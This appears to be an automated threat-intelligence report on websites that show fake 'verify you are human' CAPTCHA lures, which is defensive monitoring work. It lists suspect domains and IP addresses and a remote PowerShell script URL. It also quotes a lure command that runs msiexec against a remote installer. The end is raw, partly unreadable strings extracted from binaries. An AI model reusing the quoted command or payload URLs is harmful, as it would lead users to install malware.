ClickGrab Threat Analysis Report - 2026-05-14
Generated on 2026-05-14 01:59:36
Executive Summary
- Total sites analyzed: 100
- Sites with malicious content: 22
- Unique domains encountered: 1,696
- Total URLs extracted: 7,958
- PowerShell download attempts: 2
- Clipboard manipulation instances: 103
Domain Analysis
Most Frequently Encountered Domains
- bharatnamkeens.com: 405 occurrences
- baovechuyennghiep.baovengayvadem.com: 348 occurrences
- www.maheshwaree.com: 320 occurrences
- twitch.co.com: 318 occurrences
- 98.70.13.131: 309 occurrences
- fudgeshop.com.au: 265 occurrences
- picsera.com: 226 occurrences
- 18.176.47.246: 218 occurrences
- adturekorea.co.kr: 214 occurrences
- scillarodriguez.com: 198 occurrences
- www.ccera-icar.org: 178 occurrences
- www.evodigital.com.au: 156 occurrences
- devblog.ezeelogin.com: 132 occurrences
- www.dorper.com.au: 125 occurrences
- picsera.sirv.com: 121 occurrences
URL Pattern Analysis
reCAPTCHA imagery
11 occurrences across 8 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/recaptcha/api.js(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(1 times)https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm(1 times)- ...and 3 more distinct URLs
Font resources
75 occurrences across 61 distinct URLs
https://fonts.gstatic.com(6 times)https://fonts.googleapis.com(4 times)https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620(2 times)https://use.fontawesome.com/releases/v5.6.3/css/all.css(2 times)- ...and 56 more distinct URLs
CDN hosted scripts
9 occurrences across 9 distinct URLs
https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js(1 times)https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/(1 times)https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8(1 times)- ...and 4 more distinct URLs
Google resources
122 occurrences across 67 distinct URLs
https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png(32 times)https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(13 times)https://fonts.googleapis.com(4 times)https://www.googletagmanager.com/gtm.js?id=(4 times)https://www.google(3 times)- ...and 62 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 525 (110 unique)
Keyword Categories
Social Engineering
44 unique keywords
verification-code-bEE4bmZ6Sis0OVNmUDNCTHp3NWF2VmtTOEVZS2tDeThycE1CcFNPZUttcUZVVnBlT01LZlk1UFh1bm1vZDFqUm5ZOU91c3FNMk5rMnh3MWxqNDdNTTh4UUlnRW1RVjJmemdOM1drcEJWWnk2VmdFUWFac05XcWJMOW9BdkFWRFN8NlJHVVdMb21HSEFXRkc0SFErT0N3ODBid0t3MjA3djcwc20yZHhFekdOST0Verify you are humancommand = "msiexec /i https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/";captcha_wordexec /i https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/";Checking if you are humancaptcha-badgeRobotTo better prove you are not a robotverification- ...and 34 more
Obfuscation Indicators
11 unique keywords
eval(script)eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)eval('var timeOut'+popupItems[i].id)Command for the linkW! Set the Show Command for the linkW Tell the link to resolve itselfWWW! Get the IconLocation for the linkW! Set the IconLocation for the linkW! Tell the link to save the changesW ISetupStringTable InterfaceWWW Get string from nameWW get_SuiteCallbackW put_SuiteCallbackW get_SuiteExtension put_SuiteExtensionI Command line argument passed to setup.exe when it's launched after rebootW* Set a shortcut property for an opened link7 Retrieve any failures from applying shortcut propertiesWWW0 Set a shortcut property for Run As AdministratorWW3 Retrieve shortcut property for Run As AdministratorWWW. Interface ISetupDynamicLinkedLibraryController InstallShield LogServices ClassWWW ISetupLogService Interface8 Opens the Log Database from the specified Storage objectWW: Creates a new Log Database on the specified Storage object* Opens the Log Database in a read-only mode ISetupLogService2 InterfaceWWW SetupMainWindow ClassW ISetupMainWindow Interface Window caption Window handleW Shows/Hides wait cursorWWW Create windowW Destroy window ISetupWindowText Interface property Color property TextWeval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")eval(frameContents)eval("clearTimeout(timeIn"+uid+")")eval(eval("clearTimeout(timeOut"+uid+")")- ...and 1 more
System Commands
33 unique keywords
Command key on Mac, Win key on other platforms.Exec format error Arg list too long No such device or address Input/output error Interrupted function call No such process No such file or directory Operation not permitted No error : : V i s u a l C + + C R T : N o t e n o u g h m e m o r y t o c o m p l e t e c a l l t o s t r e r r o r . Visual C++ CRT: Not enough memory to complete call to strerror. /c TMP / c T M P ccs= UTF-8 UTF-16LE UNICODE c c s = U T F - 8 U T F - 1 6 L E U N I C O D E X������<